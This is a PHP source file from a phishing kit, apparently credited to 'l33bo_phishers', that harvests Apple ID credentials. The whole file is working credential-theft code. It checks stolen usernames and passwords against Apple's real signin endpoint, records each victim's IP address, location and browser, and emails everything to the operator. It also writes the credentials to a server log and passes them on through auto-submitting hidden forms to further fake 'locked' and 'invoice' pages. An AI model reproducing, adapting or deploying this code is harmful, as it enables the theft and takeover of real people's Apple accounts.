BB

1. <?
2. /*
3. Created by l33bo_phishers -- icq: 695059760
4. */
5. require "session_protect.php";
6. require "functions.php";
7. require_once dirname(__FILE__)."/../../setting.php";
8. $domain = "https://$_SERVER[SERVER_NAME]";
9. if($t_login == "yes"){
10. $_SESSION['user'] = $_POST['user'];
11. $_SESSION['pass'] = $_POST['pass'];
12. $uZer = $_POST['user'];
13. $paZZ = $_POST['pass'];
14. if(isset($_POST["user"]) AND isset($_POST["pass"])){
15.  
16. $ch = curl_init();
17.  
18. curl_setopt($ch, CURLOPT_URL, "https://idmsa.apple.com/appleauth/auth/signin");
19. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
20. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
21. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
22. curl_setopt($ch, CURLOPT_FOLLOWLOCATION,true);
23. curl_setopt($ch, CURLOPT_POSTFIELDS, '{"accountName":"'.$_POST['user'].'","password":"'.$_POST['pass'].'","rememberMe":false}');
24. curl_setopt($ch, CURLOPT_POST, 1);
25. curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');
26.  
27. $headers = array();
28. $headers[] = "Host: idmsa.apple.com";
29. $headers[] = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0";
30. $headers[] = "Accept: application/json, text/javascript, */*; q=0.01";
31. $headers[] = "Accept-Language: en-US,en;q=0.5";
32. $headers[] = "Referer: https://idmsa.apple.com/appleauth/auth/signin?widgetKey=65cf91973b413a70631c3e4d2e682494&language=en_US";
33. $headers[] = "Content-Type: application/json";
34. $headers[] = "X-Apple-Widget-Key: 65cf91973b413a70631c3e4d2e682494";
35. $headers[] = "X-Apple-I-Fd-Client-Info: {\"U\"\":\"\"Mozilla/5.0";
36. $headers[] = "X-Apple-Locale: en_US";
37. $headers[] = "X-Requested-With: XMLHttpRequest";
38. $headers[] = "Cookie: s_vi=[CS]v1|2CFF4972850311C2-60001183E000606C[CE]; as_dc=nwk; dssf=1; dssid2=46bdfe05-af3f-458f-a75e-b8da0c162378; as_pcts=nShAgwM4YjAw7vS8Y1J-t_aOuLFaaW3+-u05pWi+1CCWikia90im6ctTZc6U4Ua; as_sfa=Mnx1c3x1c3x8ZW5fVVN8Y29uc3VtZXJ8aW50ZXJuZXR8MHwwfDE=; optimizelyEndUserId=oeu1514952128951r0.5497066321506434; optimizelySegments=%\"7B\"%\"22341793217\"%\"22\"%\"3A\"%\"22search\"%\"22\"%\"2C\"%\"22341794206\"%\"22\"%\"3A\"%\"22false\"%\"22\"%\"2C\"%\"22341824156\"%\"22\"%\"3A\"%\"22ff\"%\"22\"%\"2C\"%\"22341932127\"%\"22\"%\"3A\"%\"22none\"%\"22\"%\"7D;";
39. $headers[] = "Connection: keep-alive";
40. $headers[] = "Pragma: no-cache";
41. $headers[] = "Cache-Control: no-cache";
42. curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
43.  
44. $result = curl_exec($ch);
45. if (curl_errno($ch)) {
46. echo 'Error:' . curl_error($ch);
47. }
48. curl_close ($ch);
49. $cek = json_decode($result);
50. $true = $cek->authType;
51. if ($true == "sa" or $true == "hsa" or $true == "hsa2") {
52. if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
53. $ip = $_SERVER['HTTP_CLIENT_IP'];
54. } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
55. $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
56. } else {
57. $ip = $_SERVER['REMOTE_ADDR'];
58. }
59.  
60. $systemInfo = systemInfo($ip);
61. $VictimInfo1 = "| IP Address :"." ".$ip." (".gethostbyaddr($ip).")";
62. $VictimInfo2 = "| Location :"." ".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country'];
63. $VictimInfo3 = "| UserAgent :"." ".$systemInfo['useragent'];
64. $VictimInfo4 = "| Browser :"." ".$systemInfo['browser'];
65. $VictimInfo5 = "| Platform :"." ".$systemInfo['os'];
66. $VictimInfo6 = "".$systemInfo['country'];
67. $from = $SenderEmail;
68. $headers = "From: $SenderLogin <$SenderEmail>";
69. $subj = "Login Apple [".$systemInfo['country']." $ip]";
70. $to = $Your_Email;
71. $warnsubj = "Abuse";
72. $data = "
73. ++-----------[*HIRORSJ RESULT*]------------++
74.  
75. ------------------------------------------
76. Apple Login
77. ------------------------------------------
78. Username : $uZer
79. Password : $paZZ
80.  
81. ------------------------------------------
82. Victim Login
83. ------------------------------------------
84. From : $VictimInfo1 - $VictimInfo2
85. Browser : $VictimInfo3 - $VictimInfo4 - $VictimInfo5
86.  
87. ++---------===[ $$ End Resutls $$ ]===---------++";
88. mail($to,$subj,$data,$headers);
89. $empas = "$uZer | $paZZ [ ".$systemInfo['country']." ]\n";
90. $file = $_SERVER['DOCUMENT_ROOT']."/assets/logs/hmp.log";
91. $isi1 = @file_get_contents($file);
92. $buka1 = fopen($file,"a");
93. fwrite($buka1, $empas);
94. fclose($buka1);
95.  
96. $file2 = $_SERVER['DOCUMENT_ROOT']."/assets/logs/._login_.txt";
97. $isi = @file_get_contents($file2);
98. $buka = fopen($file2,"w");
99. fwrite($buka, $isi+1);
100. fclose($buka);
101. ?>
102. <?php if($typelogin == "locked"){
103. ?>
104. <form action='../locked.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
105. <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
106. <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
107. </form>
108. <script language="JavaScript">
109. document.frm.submit();
110. </script>
111. }?>
112. <?php }else{
113. ?>
114. <form action='../invoice.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
115. <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
116. <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
117. </form>
118. <script language="JavaScript">
119. document.frm.submit();
120. </script>
121. <?php }}else{
122.  
123. ?>
124. <iframe width="100%" height="100%" name="login" id="login" src="<?php echo "$domain/assets/signin.php";?>" frameborder="0" scrolling="no"></iframe>
125. <?php
126. }
127. }
128. }else{
129. $_SESSION['user'] = $_POST['user'];
130. $_SESSION['pass'] = $_POST['pass'];
131. $uZer = $_POST['user'];
132. $paZZ = $_POST['pass'];
133. if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
134. $ip = $_SERVER['HTTP_CLIENT_IP'];
135. } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
136. $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
137. } else {
138. $ip = $_SERVER['REMOTE_ADDR'];
139. }
140.  
141. $systemInfo = systemInfo($ip);
142. $VictimInfo1 = "| IP Address :"." ".$ip." (".gethostbyaddr($ip).")";
143. $VictimInfo2 = "| Location :"." ".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country'];
144. $VictimInfo3 = "| UserAgent :"." ".$systemInfo['useragent'];
145. $VictimInfo4 = "| Browser :"." ".$systemInfo['browser'];
146. $VictimInfo5 = "| Platform :"." ".$systemInfo['os'];
147. $VictimInfo6 = "".$systemInfo['country'];
148. $from = $SenderEmail;
149. $headers = "From: $SenderLogin <$SenderEmail>";
150. $subj = "Login Apple [".$systemInfo['country']." $ip]";
151. $to = $Your_Email;
152. $warnsubj = "Abuse";
153. $data = "
154. ++-----------[*HIRORSJ RESULT*]------------++
155.  
156. ------------------------------------------
157. Apple Login
158. ------------------------------------------
159. Username : $uZer
160. Password : $paZZ
161.  
162. ------------------------------------------
163. Victim Login
164. ------------------------------------------
165. From : $VictimInfo1 - $VictimInfo2
166. Browser : $VictimInfo3 - $VictimInfo4 - $VictimInfo5
167.  
168. ++---------===[ $$ End Resutls $$ ]===---------++";
169. mail($to,$subj,$data,$headers);
170. $empas = "$uZer | $paZZ [ ".$systemInfo['country']." ]\n";
171. $file = $_SERVER['DOCUMENT_ROOT']."/assets/logs/hmp.log";
172. $isi1 = @file_get_contents($file);
173. $buka1 = fopen($file,"a");
174. fwrite($buka1, $empas);
175. fclose($buka1);
176.  
177. $file2 = $_SERVER['DOCUMENT_ROOT']."/assets/logs/._login_.txt";
178. $isi = @file_get_contents($file2);
179. $buka = fopen($file2,"w");
180. fwrite($buka, $isi+1);
181. fclose($buka);
182. ?>
183. <?php if($typelogin == "locked"){
184. ?>
185. <form action='../locked.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
186. <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
187. <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
188. </form>
189. <script language="JavaScript">
190. document.frm.submit();
191. </script>
192. }?>
193. <?php }else{
194. ?>
195. <form action='../invoice.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
196. <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
197. <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
198. </form>
199. <script language="JavaScript">
200. document.frm.submit();
201. </script>
202. <?php
203. }}
204. ?>